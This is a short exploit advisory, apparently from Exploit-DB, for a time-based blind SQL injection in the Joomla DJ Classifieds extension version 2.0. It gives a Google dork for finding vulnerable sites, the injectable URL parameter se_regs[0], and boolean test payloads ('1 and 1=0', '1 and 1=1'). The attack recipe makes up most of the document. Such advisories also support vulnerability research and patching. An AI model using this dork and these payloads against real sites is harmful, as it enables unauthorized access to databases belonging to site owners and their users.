Joomla DJ Classifieds Extension component version 2.0 suffers from a remote blind SQL injection vulnerability.
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\______/ \__|\__| \__|\__|\______/
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage:
# Software Link: -
# Version: 2.0
# Tested on: Linux
Link: http://server/joomla/index.php/dj-classifieds/
Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]
# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1
Credits to: Greek Hacking Scene